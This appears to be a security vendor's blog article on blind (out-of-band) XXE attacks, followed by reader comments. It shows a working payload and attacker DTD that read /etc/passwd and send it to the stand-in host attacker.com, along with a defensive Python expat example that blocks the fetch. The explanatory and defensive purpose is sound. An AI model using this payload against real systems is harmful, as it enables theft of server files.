Out-of-band XML External Entity (OOB-XXE)

As with many types of attacks, you can divide XML External Entity attacks (XXE attacks) into two types: in-band and out-of-band. In-band XXE attacks are more common and let the attacker receive an immediate response to the XXE payload. In the case of out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application. To learn about in-band XXE vulnerabilities and attacks, read the following article: What Are XML External Entity (XXE) Attacks.

The process for exploiting out-of-band XXE vulnerabilities is similar to using parameter entities with in-band XXE and involves the creation of an external DTD (Document Type Definition). There is one major difference: with this type of attack, the XML parser must make an additional request to an attacker-controlled server, and it is that request which carries the contents of the local file out to the attacker.

The following is an example of how an attacker could leverage parameter entities to steal sensitive data using an out-of-band (OOB) technique.

Request

POST http://example.com/xml HTTP/1.1

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<data>&send;</data>

Attacker DTD (attacker.com/evil.dtd)

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?collect=%file;'>">
%all;

The attack is conducted as follows:

  1. The XML parser first processes the %file parameter entity, which loads the file /etc/passwd.
  2. Next, the XML parser makes a request to the attacker’s DTD file at http://attacker.com/evil.dtd.
  3. After the XML parser processes the attacker’s DTD file, the %all parameter entity creates a general entity called &send, which contains a URL. This URL includes the file contents (e.g. http://attacker.com/?collect=root:!:0:0::/:/usr/bin/ksh…).
  4. Finally, after the URL is constructed, the XML parser processes the &send entity, which makes a request to the attacker’s server.
  5. The attacker can log the request on their end and reconstruct the file from the log entry.

Conclusion

XML External Entity (XXE) vulnerabilities, both in-band and out-of-band, are very serious and affect almost any web application that parses XML documents. They are the number 4 threat in the OWASP Top 10 2017 list. XXE can be used to cause a denial of service as well as steal system files and source code from local servers. Attackers can also use XXE to launch Server Side Request Forgery (SSRF) attacks upon other servers on the internal network.

Fortunately, it’s easy to test if your website or web application is vulnerable to XXE and other vulnerabilities by running an automated web scan using the Acunetix vulnerability scanner, which includes a specialized XXE scanner module. Take a demo and find out more about running XXE scans against your website or web application.

The easiest way to avoid all types of XXE is to disable DTDs (Document Type Definitions). If you cannot do it, check the XXE Prevention Cheat Sheet by OWASP.
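As an added illustration (not code from the article or from Acunetix), the following Python script feeds the request body shown above to the standard library's expat parser under two policies. First, parameter-entity resolution is switched on but every external reference is refused, so the fetch of %dtd; described in step 2 is logged and rejected instead of performed. Second, expat's default policy is used, under which %dtd; is never resolved and &send; surfaces as a skipped entity rather than being expanded. In neither mode does the parser contact attacker.com or open /etc/passwd. The hostnames are the article's placeholders, and the function names and result dictionaries are my own.

```python
import xml.parsers.expat as expat

# Constructed sample: the request body from the article. The hostnames
# (attacker.com) are the article's placeholders, not real hosts.
OOB_PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<data>&send;</data>
"""


class BlockedExternalEntity(Exception):
    """Raised when a document tries to pull in an external entity."""


def parse_blocking_external_entities(xml_bytes):
    """Parse with expat while refusing every external entity.

    Parameter-entity parsing is enabled so that the %dtd; reference reaches
    our handler (with expat's default setting it is silently skipped). The
    handler records the URL the document wanted fetched and aborts the parse
    instead of fetching it, so the parser never contacts attacker.com.
    """
    external_refs = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def refuse(context, base, system_id, public_id):
        # Log what the document asked for, then stop; nothing is fetched.
        external_refs.append(system_id)
        raise BlockedExternalEntity(system_id)

    parser.ExternalEntityRefHandler = refuse
    try:
        parser.Parse(xml_bytes, True)
    except (BlockedExternalEntity, expat.ExpatError) as exc:
        return {"ok": False, "reason": repr(exc), "external_refs": external_refs}
    return {"ok": True, "reason": None, "external_refs": external_refs}


def parse_with_expat_defaults(xml_bytes):
    """Parse with expat's defaults (parameter-entity parsing off).

    %dtd; is never resolved, so the external DTD that would define &send;
    is never loaded. Because the document is not standalone and has an
    unresolved parameter-entity reference, expat reports &send; through
    SkippedEntityHandler instead of treating it as a fatal undefined entity.
    No network or file access happens in this mode either.
    """
    external_refs, skipped, text = [], [], []
    parser = expat.ParserCreate()

    def record(context, base, system_id, public_id):
        external_refs.append(system_id)  # should never be called here
        return 1

    parser.ExternalEntityRefHandler = record
    parser.SkippedEntityHandler = lambda name, is_param: skipped.append(name)
    parser.CharacterDataHandler = text.append
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError as exc:
        return {"ok": False, "reason": str(exc), "external_refs": external_refs,
                "skipped_entities": skipped, "text": "".join(text)}
    return {"ok": True, "reason": None, "external_refs": external_refs,
            "skipped_entities": skipped, "text": "".join(text)}


if __name__ == "__main__":
    print(parse_blocking_external_entities(OOB_PAYLOAD))
    print(parse_with_expat_defaults(OOB_PAYLOAD))
```

The first function is the useful shape for a server that must accept a DOCTYPE for legacy reasons: it makes the parser's outbound requests visible (every system identifier the document tries to load is recorded) and turns them into a hard rejection, which is also a good signal to alert on. The second function shows why a parser that simply leaves parameter-entity processing off does not perform the out-of-band request at all, which is the "disable DTDs" advice above applied at the level expat offers.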

Ian Muscat

Acunetix developers and tech agents regularly contribute to the blog. All the Acunetix developers come with years of experience in the web security sphere.
  • “The easiest way to avoid all types of XXE is to disable DTDs (Document Type Definitions). If you cannot do it, check the **XSS Prevention Cheat Sheet by OWASP**.”

    I may be wrong but I guess this is a typo and should be “..XXE Prevention Cheat Sheet by OWASP” ?

  • You mention “&xxe” in steps 3 and 4, but the code snippet reflects that it should be “&send”

    Thanks for this writeup, I was struggling with a DTD I was working on that didn’t use the entity expansion/creation in step 3 and I’m still not sure why that’s necessary.
